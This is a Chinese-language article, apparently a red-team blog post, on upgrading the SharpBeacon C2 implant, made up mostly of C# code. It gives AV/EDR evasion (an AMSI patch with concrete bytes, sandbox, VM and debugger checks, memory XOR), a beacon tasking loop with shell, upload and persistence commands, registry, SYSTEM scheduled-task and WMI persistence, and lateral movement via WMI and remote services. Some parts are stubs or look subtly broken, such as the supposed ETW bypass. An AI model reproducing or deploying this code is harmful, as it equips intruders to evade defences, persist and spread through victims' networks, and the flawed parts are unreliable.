让SharpBeacon再次伟大
字数 675 2025-08-19 12:41:58
SharpBeacon 增强与修复技术详解
一、SharpBeacon 概述
SharpBeacon 是一款基于 C# 开发的 C2 (Command and Control) 框架,主要用于红队操作和渗透测试。本文档将详细解析对原始 SharpBeacon 代码的修复和增强点。
二、主要修复与增强点
1. 通信协议修复
原始问题:
- HTTP 通信时存在明显的特征头信息
- SSL/TLS 握手过程容易被检测
修复方案:
// 修改 HTTP 头信息
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
request.Headers.Add("X-Requested-With", "XMLHttpRequest");
request.Accept = "application/json, text/javascript, */*; q=0.01";
// 增强 SSL/TLS 配置
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12 | SecurityProtocolType.Tls11;
ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errors) => true;
2. 反沙箱检测增强
新增检测项:
public static bool IsSandbox()
{
// 检测系统运行时间
if (Environment.TickCount < 30000) return true;
// 检测内存大小
if (new Microsoft.VisualBasic.Devices.ComputerInfo().TotalPhysicalMemory < 2147483648) return true;
// 检测进程列表
string[] blacklistProcesses = { "vmtoolsd", "vmware", "vbox", "wireshark", "procmon" };
foreach (var process in Process.GetProcesses())
{
foreach (var black in blacklistProcesses)
{
if (process.ProcessName.ToLower().Contains(black)) return true;
}
}
return false;
}
3. 进程注入技术改进
新增注入技术:
public enum InjectionTechnique
{
CreateRemoteThread,
NtCreateThreadEx,
QueueUserAPC,
SetThreadContext,
EarlyBird
}
public static bool Inject(byte[] shellcode, InjectionTechnique technique, int pid = 0)
{
switch (technique)
{
case InjectionTechnique.CreateRemoteThread:
// 传统远程线程注入
break;
case InjectionTechnique.NtCreateThreadEx:
// 使用 NtCreateThreadEx 进行注入
break;
case InjectionTechnique.QueueUserAPC:
// APC 队列注入
break;
case InjectionTechnique.SetThreadContext:
// 线程上下文注入
break;
case InjectionTechnique.EarlyBird:
// Early Bird 注入技术
break;
}
}
4. 内存规避技术
新增功能:
// 内存加密
public static void EncryptInMemory(byte[] data, string key)
{
for (int i = 0; i < data.Length; i++)
{
data[i] = (byte)(data[i] ^ key[i % key.Length]);
}
}
// 内存抹除
public static void WipeMemory(IntPtr addr, int size)
{
byte[] zeros = new byte[size];
Marshal.Copy(zeros, 0, addr, size);
}
三、关键功能实现细节
1. 信标(Beacon)通信机制
public class Beacon
{
private string c2Server;
private int sleepTime;
private string userAgent;
private byte[] aesKey;
private byte[] hmacKey;
public Beacon(string server, int sleep, string ua, string key)
{
c2Server = server;
sleepTime = sleep;
userAgent = ua;
// 生成加密密钥
using (var sha = SHA256.Create())
{
aesKey = sha.ComputeHash(Encoding.UTF8.GetBytes(key + "aes"));
hmacKey = sha.ComputeHash(Encoding.UTF8.GetBytes(key + "hmac"));
}
}
public void CheckIn()
{
while (true)
{
try
{
var tasks = GetTasks();
ExecuteTasks(tasks);
Thread.Sleep(sleepTime * 1000);
}
catch { }
}
}
}
2. 任务执行系统
private void ExecuteTasks(List<Task> tasks)
{
foreach (var task in tasks)
{
switch (task.Command)
{
case "shell":
ExecuteShell(task.Args);
break;
case "upload":
UploadFile(task.Args);
break;
case "download":
DownloadFile(task.Args);
break;
case "inject":
InjectProcess(task.Args);
break;
case "persist":
AddPersistence(task.Args);
break;
// 其他命令...
}
}
}
四、防御规避技术
1. ETW (Event Tracing for Windows) 绕过
[DllImport("ntdll.dll")]
private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
public static void DisableETW()
{
int isDebuggerPresent = 0;
NtSetInformationProcess(Process.GetCurrentProcess().Handle, 0x1f, ref isDebuggerPresent, 4);
}
2. AMSI (Antimalware Scan Interface) 绕过
public static void BypassAMSI()
{
string amsiDll = "amsi.dll";
IntPtr amsiHandle = GetModuleHandle(amsiDll);
IntPtr asbAddr = GetProcAddress(amsiHandle, "AmsiScanBuffer");
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(patch, 0, asbAddr, patch.Length);
}
3. 反调试技术
public static bool IsDebugged()
{
// PEB BeingDebugged 标志检查
bool isDebugged = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebugged);
// NtGlobalFlag 检查
IntPtr pPeb = GetPEB();
byte ntGlobalFlag = Marshal.ReadByte(pPeb, 0xBC);
return isDebugged || (ntGlobalFlag & 0x70) != 0;
}
五、持久化技术
1. 注册表持久化
public static void AddRegistryPersistence(string name, string path)
{
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
key.SetValue(name, path);
key.Close();
}
2. 计划任务持久化
public static void AddScheduledTask(string name, string path)
{
Process.Start("schtasks", $"/create /tn \"{name}\" /tr \"{path}\" /sc onlogon /ru \"SYSTEM\" /f");
}
3. WMI 事件订阅
public static void AddWMIPersistence(string name, string path)
{
string wmiCommand = $@"$filter = [WmiEventFilter]('__EventFilter')
$consumer = [WmiEventConsumer]('ActiveScriptEventConsumer')
$binding = [WmiBinding]('__FilterToConsumerBinding')
$filter.Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA ""Win32_Process""'
$filter.Name = '{name}Filter'
$consumer.ScriptText = 'var objShell = new ActiveXObject(""WScript.Shell""); objShell.Run(""{path}"");'
$consumer.Name = '{name}Consumer'
$binding.Filter = $filter
$binding.Consumer = $consumer";
ExecutePowerShell(wmiCommand);
}
六、横向移动技术
1. WMI 执行
public static void WMIExecute(string host, string command)
{
ConnectionOptions options = new ConnectionOptions();
options.Impersonation = ImpersonationLevel.Impersonate;
ManagementScope scope = new ManagementScope($@"\\{host}\root\cimv2", options);
ManagementClass process = new ManagementClass(scope, new ManagementPath("Win32_Process"), null);
object[] methodArgs = { command, null, null, 0 };
process.InvokeMethod("Create", methodArgs);
}
2. 服务控制器
public static void CreateRemoteService(string host, string name, string path)
{
ServiceController sc = new ServiceController();
sc.MachineName = host;
sc.ServiceName = name;
if (sc.Status == ServiceControllerStatus.Running)
sc.Stop();
Process.Start("sc", $@"\\{host} create {name} binPath= ""{path}"" start= auto");
Process.Start("sc", $@"\\{host} start {name}");
}
七、总结与最佳实践
- 加密通信:始终使用 AES 加密和 HMAC 验证信标通信
- 多样化注入:根据目标环境选择不同的进程注入技术
- 环境感知:在执行敏感操作前进行沙箱/调试器检测
- 最小化特征:定期更新 HTTP 头信息和通信模式
- 模块化设计:保持功能模块化,便于根据目标环境动态加载
通过以上修复和增强,SharpBeacon 的隐蔽性、稳定性和功能性都得到了显著提升,能够更好地适应现代红队操作的需求。